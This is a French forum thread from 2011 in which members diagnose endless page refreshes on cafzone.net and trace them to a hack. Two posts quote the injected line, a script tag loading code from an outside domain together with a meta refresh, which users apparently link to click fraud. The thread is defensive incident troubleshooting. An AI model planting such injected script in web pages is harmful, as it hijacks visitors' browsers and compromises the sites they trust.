Inscrivez-vous sur GeekZone pour profiter des fonctions avancées du forum, proposer des news, participer aux conversations, ouvrir votre galerie, profiter de la messagerie interne et venir tester nos modérateurs avec du bon troll... Attention, ils ont la gâchette facile. C’est aussi pour ça que GeekZone est le meilleur site de passionnés depuis 2002 ! Si vous avez déjà un compte, connectez-vous - sinon, il est temps d'en créer un.
Cafzone.net et refresh
#1
Posté 13 November 2011 - 18:44
Dès que je change de la première page, les autres pages passent leur temps à se rafraichir aussi bien sur firefox que sur Chrome.
Si quelqu'un a une idée ?
#2
Posté 13 November 2011 - 21:18
T'as pas un userscript qui est activé qui aurait un effet de bord ou un truc comme ca ptet.
#3
Posté 13 November 2011 - 21:40
#4
Posté 14 November 2011 - 02:33
Ce qui ne nous tue pas nous rend plus fort
Donc le ridicule nous rend plus fort
Mon blog qui parle de jeux
#5
Posté 14 November 2011 - 08:25
J'ai une Méta:
Nom Contenu
Refresh 0;url=http://www.cafzone.net/page/2/
Si ça peut aider
#6
Posté 14 November 2011 - 11:37
#7
Posté 14 November 2011 - 11:43
#8
Posté 14 November 2011 - 12:00
Alors en essayant un peu plus, cela ne me le fait que sur les pages principales sauf la 1.
Si je clic sur un sujet par exemple, une fois dans le sujet c'est bon ("Made in iceland, en tête de la page 2, une fois dedans c'est bon).
ah et en revenant en arrière , là c'est bon ????????????
Et là cela ne me le fait plus (tout ça en 5 minutes).
Je testerai de nouveau de chez moi ce soir.
#9
Posté 14 November 2011 - 12:10
#10
Posté 14 November 2011 - 12:16
<meta http-equiv='refresh'qui doit s'exécuter toutes les 0 secondes... je sais pas si c'est dans le code de base ou une extension chrome qui fait bugger/ajoute ça par erreur, mais le refresh viens de là je pense.
edit : le code complet, c'est la toute première ligne.
<script src='http://turnitupnow.net/?rnd=3697%2Ften.enozfac.www'></script><meta http-equiv='refresh' content='0;url=http://www.cafzone.net/'>
voilà c'est une réponse à la va-vite, j'ai pas beaucoup mieux à proposer/dire.
Modifié par Greytarkis, 14 November 2011 - 12:18.
#11
Posté 14 November 2011 - 12:20
#12
Posté 14 November 2011 - 12:46
Winny s'est fait hacké son blog, un vieux dotclear. Le hack : cette ligne de code en haut de page :
<script src='http://turnitupnow.net/?rnd=3697%2Ften.enozfac.www'></script><meta http-equiv='refresh' content='0;url=http://winny.fr/'>
On a stop le blog immédiatement et mis un wordpress à jour (jeudi dernier). Mais comme son blog est hébergé sur le même serveur, je me demande s'il y a pas un lien...
bref, ça pue.
#13
Posté 14 November 2011 - 13:17
OK trouvé, injection de code dans le header via hack mais je sais pas comment le mec a fait...
Je préviens Unreal...
Des infos ici : http://wpquestions.c...on/show/id/3341
#14
Posté 14 November 2011 - 14:17
Si je comprends bien, c'est pas Winny qui s'est fait hack son site mais cafzone ou tout du moins un wrodpress ? et ça impacté les autres siteweb hébergés sur le serveur ?Le truc zarb c'est que je vois rien du tout dans le source... :x
OK trouvé, injection de code dans le header via hack mais je sais pas comment le mec a fait...
Je préviens Unreal...
Des infos ici : http://wpquestions.c...on/show/id/3341
Il y a quoi d'autre comme site ? Hawks-Reborn est tjs dessus ? Ou bien c'est HR qui s'est fait hack ?
bref... ça pue...
Edit : ok ca serait une injection via TinyMCE utilisé dans le vieux DotClear. En gros, on se tape une nettoyage complet ce soir ? ou c'est tellement la merde que ça va pas suffire ?
Modifié par Donjohn, 14 November 2011 - 14:30.
#15
Posté 14 November 2011 - 14:47
Si je comprends bien, c'est pas Winny qui s'est fait hack son site mais cafzone ou tout du moins un wrodpress ? et ça impacté les autres siteweb hébergés sur le serveur ?
Il y a quoi d'autre comme site ? Hawks-Reborn est tjs dessus ? Ou bien c'est HR qui s'est fait hack ?
bref... ça pue...
Edit : ok ca serait une injection via TinyMCE utilisé dans le vieux DotClear. En gros, on se tape une nettoyage complet ce soir ? ou c'est tellement la merde que ça va pas suffire ?
J'ai rien remarqué de spécial sur HR mais je peux pas tout regarder à fond depuis le taf, je check plus en profondeur ce soir :x
J'avais remarqué le refresh sur GZ sans y faire attention mais jamais rencontré sur HR.
Par contre, j'ai regardé un peu plus en détails l'histoire de TinyMCE: IPB utilise CKEditor et ça ne semble donc pas pouvoir être l'accès direct (ce qui pourrait donc avoir épargné HR). Par contre est-ce que ça ne peut pas être lié à Cafzone.net, WP utilisant tinyMCE (de même que Dotclear/WP pour le blog de Winny)?
#16
Posté 14 November 2011 - 15:09
Attack le 9 novembre 2011 entre 7h00 et 9h00 en gros.
#17
Posté 14 November 2011 - 15:18
je vais DL les 3 comptes Winny/Chaaat et le mien et check tous les fichiers un par un.
#18
Posté 14 November 2011 - 15:30
ya une chaine texte unique à chercher ?? un bout de code facilement identifiable ?
je vais DL les 3 comptes Winny/Chaaat et le mien et check tous les fichiers un par un.
http://pastebin.com/8vfuzWK8
Version lisble : http://pastebin.com/zmWCsULL
#20
Posté 15 November 2011 - 09:01
tu sors... (mais elle était bonne, j'avoueDoit-on s'inquiéter pour nos mots de passe ?
#21
Posté 15 November 2011 - 09:51
#22
Posté 15 November 2011 - 11:01
Le hack sert en fait à faire des shadow clics sur un site à la con...
#24
Posté 17 November 2011 - 20:26
Merci les gens
(juste les pages un peu lente à charger, mais à, je soupçonne mon cher ami free)
0 utilisateur(s) li(sen)t ce sujet
0 membre(s), 0 invité(s), 0 utilisateur(s) anonyme(s)










Retour en haut










